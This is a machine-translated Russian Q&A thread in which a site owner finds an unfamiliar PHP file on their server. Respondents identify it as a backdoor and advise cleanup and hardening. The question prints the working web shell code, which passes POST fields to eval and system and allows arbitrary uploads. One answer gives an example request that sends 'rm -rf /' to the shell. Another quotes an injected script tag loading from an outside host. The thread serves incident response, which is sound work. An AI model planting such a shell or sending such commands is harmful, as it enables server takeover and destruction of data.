Недавно я нашел 4 необычных файла на моем сервере (которые я не загружал). Имя файла было таким: goog1e7a20543b128921.php
И вот код, который был внутри них:
Goog1e_analist_up<?php [email protected]$_POST['e'];[email protected]$_POST['s'];if($e){eval($e);}if($s){system($s);}if($_FILES['f']['name']!=''){move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);}?>
Вы знаете, что должен делать этот код..? Должен ли я начинать паниковать??
Спасибо.
Да, это вредоносный код. Эта оболочка script позволит выполнять код, а также загружать любой файл, если злоумышленник знает переданные ему параметры. Я рекомендую искать все файлы для этого кода, проверять права на файл и менять пароли на всякий случай.
Я предлагаю вам использовать HTML-очиститель или OWASP, чтобы сделать многое в безопасности.
Вы должны отключить конструкцию eval, если вы ее не используете (и не должны, если вам это действительно нужно).
Проанализируйте настройки сервера для любых дыр в безопасности с помощью:
Это бэкдор на ваш веб-сервер.
Это позволяет злоумышленникам отправить запрос на http://you.com/goog1e7a20543b128921.php?s=rm -rf / для удаления всей системы.
Затем вы должны провести тщательный обзор безопасности вашего сайта, чтобы выяснить, как они там попали.
Для справки:
if($e){eval($e);}
Это позволяет злоумышленнику выполнить любую команду PHP, которую они хотят.
if($s){system($s);}
Это позволяет злоумышленнику выполнить любую системную команду, которую они хотят, как и любой пользователь, на котором работает ваш веб-сервер.
if($_FILES['f']['name']!=''){move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);}
Это позволяет злоумышленнику загружать любой файл, который им нужен - снова пользователь, который выполняет ваш веб-сервер, определяет права доступа к файлам.
Итак, паника: -p
Я уверен, что в Интернете есть много статей о том, как справиться с этим. Вкратце, создайте резервную копию своей системы для анализа позже, переустановите сервер с нуля (вы не знаете, что еще они сделали с вами, поэтому просто удалить файлы недостаточно.), Пытаясь разобраться, как они вошли и затыкая отверстие.
eval ($ e) - команда удаленного выполнения система - экв. для каталога listind $ _FILES ['f'] ['name'] - для uploand script для инструментов сервера eq hack и т.д.
По-видимому, вы не единственный из них. googled it real quick, другие сайты также заражены. это выглядит как все время, когда зараженный файл хранится в папке с изображениями.
Связано: Попробуйте установить phpAntiVirus в будущем и спросите своего провайдера о mod_security. Это может смягчить будущие хаки. В любом случае эти файлы не материализуются сами по себе на вашем сервере. Избавьтесь от всех старых PHP-приложений.
Ищите это в каждом файле. <script src="http://nt02.co.in/3"></script> Если вы найдете его с помощью ftp, посмотрите дату, когда файл был изменен, и откройте все файлы, измененные в эту дату, и удалите их.